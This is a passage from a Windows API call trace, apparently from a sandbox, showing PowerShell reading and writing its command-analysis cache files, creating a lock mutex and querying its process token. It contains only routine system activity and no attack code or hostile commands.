lpFileInformation=0x25b5c704168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0282.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb00) returned 1 [0282.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c9c0) returned 1 [0282.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8caa0 | out: lpFileInformation=0x653ef8caa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0282.205] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8c420, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0282.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c900) returned 1 [0282.205] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x960 [0282.205] GetFileType (hFile=0x960) returned 0x1 [0282.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c870) returned 1 [0282.205] GetFileType (hFile=0x960) returned 0x1 [0282.206] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c7057b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c768, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7057b8*, lpNumberOfBytesRead=0x653ef8c768*=0x1000, lpOverlapped=0x0) returned 1 [0282.210] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c70759a, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8c408, lpOverlapped=0x0 | out: lpBuffer=0x25b5c70759a*, lpNumberOfBytesRead=0x653ef8c408*=0x1f, lpOverlapped=0x0) returned 1 [0282.210] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c7057b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c3d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7057b8*, lpNumberOfBytesRead=0x653ef8c3d8*=0x1000, lpOverlapped=0x0) returned 1 [0282.213] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c70759c, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8c288, lpOverlapped=0x0 | out: lpBuffer=0x25b5c70759c*, lpNumberOfBytesRead=0x653ef8c288*=0x27, lpOverlapped=0x0) returned 1 [0282.213] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c7057b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c328, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7057b8*, lpNumberOfBytesRead=0x653ef8c328*=0x1000, lpOverlapped=0x0) returned 1 [0282.213] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c707568, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8c1e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c707568*, lpNumberOfBytesRead=0x653ef8c1e8*=0x5, lpOverlapped=0x0) returned 1 [0282.214] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c7057b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c288, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7057b8*, lpNumberOfBytesRead=0x653ef8c288*=0x1000, lpOverlapped=0x0) returned 1 [0282.214] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c70753a, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8c398, lpOverlapped=0x0 | out: lpBuffer=0x25b5c70753a*, lpNumberOfBytesRead=0x653ef8c398*=0x1d, lpOverlapped=0x0) returned 1 [0282.214] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c7057b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c438, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7057b8*, lpNumberOfBytesRead=0x653ef8c438*=0xc85, lpOverlapped=0x0) returned 1 [0282.214] ReadFile (in: hFile=0x960, lpBuffer=0x25b5c7057b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c738, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7057b8*, lpNumberOfBytesRead=0x653ef8c738*=0x0, lpOverlapped=0x0) returned 1 [0282.214] CloseHandle (hObject=0x960) returned 1 [0282.215] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.215] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.215] CoTaskMemFree (pv=0x25b73d007a0) [0282.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca40) returned 1 [0282.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb20 | out: lpFileInformation=0x653ef8cb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca00) returned 1 [0282.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", nBufferLength=0x105, lpBuffer=0x653ef8c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", lpFilePart=0x0) returned 0x93 [0282.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c980) returned 1 [0282.216] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_67a2505d-bf00-4e2f-b010-406d32caddc3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x960 [0282.216] GetFileType (hFile=0x960) returned 0x1 [0282.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c8f0) returned 1 [0282.216] GetFileType (hFile=0x960) returned 0x1 [0282.216] SetEndOfFile (hFile=0x960) returned 1 [0282.217] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c713be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c378, lpOverlapped=0x0 | out: lpBuffer=0x25b5c713be8*, lpNumberOfBytesWritten=0x653ef8c378*=0x1000, lpOverlapped=0x0) returned 1 [0282.218] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c713be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c378, lpOverlapped=0x0 | out: lpBuffer=0x25b5c713be8*, lpNumberOfBytesWritten=0x653ef8c378*=0x1000, lpOverlapped=0x0) returned 1 [0282.219] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c713be8*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x653ef8ca88, lpOverlapped=0x0 | out: lpBuffer=0x25b5c713be8*, lpNumberOfBytesWritten=0x653ef8ca88*=0x2ef, lpOverlapped=0x0) returned 1 [0282.220] CloseHandle (hObject=0x960) returned 1 [0282.222] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01020 [0282.222] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01020 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.222] CoTaskMemFree (pv=0x25b73d01020) [0282.222] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.222] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c9e0) returned 1 [0282.222] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cac0 | out: lpFileInformation=0x653ef8cac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0282.222] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8c440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0282.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0282.222] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x960 [0282.223] GetFileType (hFile=0x960) returned 0x1 [0282.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0282.223] GetFileType (hFile=0x960) returned 0x1 [0282.223] SetEndOfFile (hFile=0x960) returned 1 [0282.224] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c718370*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c718370*, lpNumberOfBytesWritten=0x653ef8c168*=0x1000, lpOverlapped=0x0) returned 1 [0282.225] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c718370*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c718370*, lpNumberOfBytesWritten=0x653ef8c338*=0x1000, lpOverlapped=0x0) returned 1 [0282.226] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c718370*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c2e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c718370*, lpNumberOfBytesWritten=0x653ef8c2e8*=0x1000, lpOverlapped=0x0) returned 1 [0282.226] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c718370*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c718370*, lpNumberOfBytesWritten=0x653ef8c168*=0x1000, lpOverlapped=0x0) returned 1 [0282.226] WriteFile (in: hFile=0x960, lpBuffer=0x25b5c718370*, nNumberOfBytesToWrite=0xced, lpNumberOfBytesWritten=0x653ef8ca28, lpOverlapped=0x0 | out: lpBuffer=0x25b5c718370*, lpNumberOfBytesWritten=0x653ef8ca28*=0xced, lpOverlapped=0x0) returned 1 [0282.226] CloseHandle (hObject=0x960) returned 1 [0282.236] ReleaseMutex (hMutex=0x95c) returned 1 [0282.237] EtwEventActivityIdControl () returned 0x0 [0282.238] SetEvent (hEvent=0x94c) returned 1 [0282.238] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d330*=0x94c, lpdwindex=0x653ef8d104 | out: lpdwindex=0x653ef8d104) returned 0x0 [0282.239] GetCurrentProcess () returned 0xffffffffffffffff [0282.239] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x960) returned 1 [0282.239] GetTokenInformation (in: TokenHandle=0x960, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.239] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984d30 [0282.239] GetTokenInformation (in: TokenHandle=0x960, TokenInformationClass=0x1, TokenInformation=0x25b73984d30, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984d30, ReturnLength=0x653ef8d6b8) returned 1 [0282.239] LocalFree (hMem=0x25b73984d30) returned 0x0 [0282.240] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c72bbe8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c72bbe8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.240] CreateMutexW (lpMutexAttributes=0x25b5c72bd38, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x964 [0282.240] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x964, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.241] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.241] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d5b0 | out: lpFileInformation=0x653ef8d5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d490) returned 1 [0282.241] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0282.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d410) returned 1 [0282.241] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x968 [0282.241] GetFileType (hFile=0x968) returned 0x1 [0282.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d380) returned 1 [0282.241] GetFileType (hFile=0x968) returned 0x1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ce00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d278, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ce00*, lpNumberOfBytesRead=0x653ef8d278*=0x1000, lpOverlapped=0x0) returned 1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ebe2, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8cf18, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ebe2*, lpNumberOfBytesRead=0x653ef8cf18*=0x1f, lpOverlapped=0x0) returned 1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ce00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cee8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ce00*, lpNumberOfBytesRead=0x653ef8cee8*=0x1000, lpOverlapped=0x0) returned 1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ebe4, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8cd98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ebe4*, lpNumberOfBytesRead=0x653ef8cd98*=0x27, lpOverlapped=0x0) returned 1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ce00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ce38, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ce00*, lpNumberOfBytesRead=0x653ef8ce38*=0x1000, lpOverlapped=0x0) returned 1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ebb0, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8ccf8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ebb0*, lpNumberOfBytesRead=0x653ef8ccf8*=0x5, lpOverlapped=0x0) returned 1 [0282.242] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ce00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cd98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ce00*, lpNumberOfBytesRead=0x653ef8cd98*=0x1000, lpOverlapped=0x0) returned 1 [0282.243] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72eb82, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8cea8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72eb82*, lpNumberOfBytesRead=0x653ef8cea8*=0x1d, lpOverlapped=0x0) returned 1 [0282.243] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ce00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cf48, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ce00*, lpNumberOfBytesRead=0x653ef8cf48*=0xc85, lpOverlapped=0x0) returned 1 [0282.243] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c72ce00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d248, lpOverlapped=0x0 | out: lpBuffer=0x25b5c72ce00*, lpNumberOfBytesRead=0x653ef8d248*=0x0, lpOverlapped=0x0) returned 1 [0282.243] CloseHandle (hObject=0x968) returned 1 [0282.243] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0282.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.243] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c739ca8 | out: lpFileInformation=0x25b5c739ca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0282.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.244] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.244] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.244] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", lpFilePart=0x0) returned 0x93 [0282.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.244] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_67a2505d-bf00-4e2f-b010-406d32caddc3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x968 [0282.244] GetFileType (hFile=0x968) returned 0x1 [0282.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.244] GetFileType (hFile=0x968) returned 0x1 [0282.245] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c73afb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c73afb8*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.245] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c73cdd2, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x653ef8cfd8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c73cdd2*, lpNumberOfBytesRead=0x653ef8cfd8*=0x3, lpOverlapped=0x0) returned 1 [0282.245] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c73afb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cfa8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c73afb8*, lpNumberOfBytesRead=0x653ef8cfa8*=0x1000, lpOverlapped=0x0) returned 1 [0282.245] ReadFile 